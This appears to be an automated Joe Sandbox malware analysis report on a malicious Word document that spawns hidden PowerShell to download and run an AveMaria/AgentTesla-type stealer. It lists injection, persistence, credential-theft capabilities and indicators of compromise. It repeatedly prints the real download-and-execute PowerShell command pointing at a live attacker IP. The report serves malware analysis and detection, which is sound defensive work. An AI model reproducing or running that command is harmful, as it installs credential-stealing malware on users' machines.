Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_004079E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00411FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004118BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\doc.exe	Queries volume information: C:\Users\user\AppData\Roaming\doc.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT VolumeInformation

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040F93F cpuid

Source: C:\Users\user\AppData\Roaming\doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040882F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,GetLocalTime,wsprintfW,lstrcatW,CreateFileW,CloseHandle,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Contains functionality to steal e-mail passwords

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: POP3 Password
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: SMTP Password
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: IMAP Password

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: \Chromium\User Data\Default\Login Data

Source: Yara match	File source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting2	Create Account1	Access Token Manipulation1	Disable or Modify Tools11	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer33	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Native API1	Windows Service1	Windows Service1	Deobfuscate/Decode Files or Information1	Input Capture21	System Service Discovery1	Remote Desktop Protocol	Input Capture21	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Scheduled Task/Job1	Process Injection321	Scripting2	Credentials In Files1	File and Directory Discovery4	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution32	Logon Script (Mac)	Scheduled Task/Job1	Obfuscated Files or Information3	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter11	Network Logon Script	Network Logon Script	Software Packing13	LSA Secrets	Security Software Discovery211	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol121	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Scheduled Task/Job1	Rc.common	Rc.common	Masquerading3	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Service Execution2	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	PowerShell3	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Users1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
catalogue_2021_samples_list_revise_ol.doc	45%	Virustotal		Browse
catalogue_2021_samples_list_revise_ol.doc	31%	ReversingLabs	Script-WScript.Trojan.RTFObfustream

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\doc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\maBdogbw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\doc.exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\maBdogbw.exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.doc.exe.400000.1.unpack	100%	Avira	TR/Redcap.ghjpt		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
httP://13.92.1	0%	Avira URL Cloud	safe
http://13.92.100.208/doc/doc.exe	100%	Avira URL Cloud	malware
httP://13.92.100.208/do	0%	Avira URL Cloud	safe
httP://13.92.100	0%	Avira URL Cloud	safe
152.67.253.163	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
httP://13.92.100.208/doc/doc.exePE	0%	Avira URL Cloud	safe
http://13.92.100.208	0%	Avira URL Cloud	safe
httP://13.92.100.208/doc/doc.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://13.92.100.208/doc/doc.exe	true	Avira URL Cloud: malware	unknown
152.67.253.163	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
httP://13.92.1	powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
httP://13.92.100.208/doc/doc.exe	powershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmp	true		unknown
httP://13.92.100.208/do	powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
httP://13.92.100	powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.piriform.com/ccleaner	powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000003.00000002.427543124.00000000022B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.430729698.00000000023D0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.piriform.com/ccleanerhttp://www.piriform.com/	powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	false		high
httP://13.92.100.208/doc/doc.exePE	powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://13.92.100.208	powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.coL	powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeper	doc.exe	false		high
httP://13.92.100.208/doc/doc.	powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
152.67.253.163	unknown	United States	31898	ORACLE-BMC-31898US	true
13.92.100.20	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
13.92.100.208	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492615
Start date:	28.09.2021
Start time:	21:16:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 47s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	catalogue_2021_samples_list_revise_ol.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winDOC@23/22@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 98.1% (good quality ratio 96.2%) Quality average: 88.2% Quality standard deviation: 20.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:17:25	API Interceptor	80x Sleep call for process: powershell.exe modified
21:17:29	API Interceptor	279x Sleep call for process: doc.exe modified
21:17:34	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
152.67.253.163	hjFNtGCV66.exe	Get hash	malicious	Browse
	Purchase Order Ref_AP_2021_02258.doc	Get hash	malicious	Browse
	fh9zxJFcRZ.exe	Get hash	malicious	Browse
	Samples - New_Export_Customer_FV07.doc	Get hash	malicious	Browse
	Pt3cgTQrIm.exe	Get hash	malicious	Browse
	SKMBT_C36021092056670.doc	Get hash	malicious	Browse
13.92.100.20	Purchase Order Ref_AP_2021_02258.doc	Get hash	malicious	Browse
13.92.100.208	Purchase Order Ref_AP_2021_02258.doc	Get hash	malicious	Browse	13.92.100.208/tcm/audio.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	.htm.htm	Get hash	malicious	Browse	13.107.213.45
	Invoices_391.vbs	Get hash	malicious	Browse	20.203.173.201
	CPHB7Z2buG.exe	Get hash	malicious	Browse	40.93.207.1
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	40.93.207.1
	2awEYXkQvX.exe	Get hash	malicious	Browse	13.89.179.12
	b2wx6oZNsC	Get hash	malicious	Browse	20.108.4.34
	E1fBXNeuOQ	Get hash	malicious	Browse	20.91.208.183
	mirkatclpb.x86	Get hash	malicious	Browse	20.192.254.49
	mirkatclpb.arm	Get hash	malicious	Browse	20.21.196.35
	ho4yrUrdk1	Get hash	malicious	Browse	70.37.124.65
	uTfW1dzdIk	Get hash	malicious	Browse	23.102.19.179
	8u6nZbyMxl	Get hash	malicious	Browse	13.84.111.152
	OTKqvzSZfm.exe	Get hash	malicious	Browse	40.93.207.0
	fmS6YYhBy1	Get hash	malicious	Browse	104.47.96.161
	sora.arm7	Get hash	malicious	Browse	20.244.127.27
	Purchase Order Ref_AP_2021_02258.doc	Get hash	malicious	Browse	13.92.100.208
	L3Gl0GugHo	Get hash	malicious	Browse	40.91.215.156
	F0ZMmHZif5	Get hash	malicious	Browse	20.36.90.155
	ov8cmawldv	Get hash	malicious	Browse	20.11.137.156
	b3astmode.arm7	Get hash	malicious	Browse	20.72.134.108
ORACLE-BMC-31898US	Slip copy.exe	Get hash	malicious	Browse	193.122.130.0
	10589TW purchase list.doc	Get hash	malicious	Browse	193.122.130.0
	bluetwozx.exe	Get hash	malicious	Browse	158.101.44.242
	hjFNtGCV66.exe	Get hash	malicious	Browse	152.67.253.163
	Invoice M470031261, M470031262, M470031263.exe	Get hash	malicious	Browse	193.122.6.168
	01_extracted.exe	Get hash	malicious	Browse	158.101.44.242
	SOA.exe	Get hash	malicious	Browse	193.122.6.168
	S.O.A.exe	Get hash	malicious	Browse	193.122.130.0
	Purchase Order Ref_AP_2021_02258.doc	Get hash	malicious	Browse	152.67.253.163
	#U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe	Get hash	malicious	Browse	193.122.130.0
	DHL NOTIFICATIONS.exe	Get hash	malicious	Browse	193.122.130.0
	2acrvok36Y.exe	Get hash	malicious	Browse	158.101.44.242
	7PUgGUWM2l	Get hash	malicious	Browse	193.122.96.94
	x86	Get hash	malicious	Browse	144.25.108.253
	cash payment.exe	Get hash	malicious	Browse	193.122.130.0
	TT09876545678T8R456.exe	Get hash	malicious	Browse	158.101.44.242
	fh9zxJFcRZ.exe	Get hash	malicious	Browse	152.67.253.163
	Swift_6408372.exe	Get hash	malicious	Browse	193.122.130.0
	Samples - New_Export_Customer_FV07.doc	Get hash	malicious	Browse	152.67.253.163
	Quotation -Scan001_No- 9300340731.doc.exe	Get hash	malicious	Browse	158.101.44.242

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\doc.exe	hjFNtGCV66.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	hjFNtGCV66.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\maBdogbw.exe	hjFNtGCV66.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	637440
Entropy (8bit):	6.333867454868441
Encrypted:	false
SSDEEP:	12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
MD5:	D8BC91E846E3D624814D4557681F33AD
SHA1:	873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
SHA-256:	30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
SHA-512:	78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: hjFNtGCV66.exe, Detection: malicious, Browse
IE Cache URL:	http://13.92.100.208/doc/doc.exe
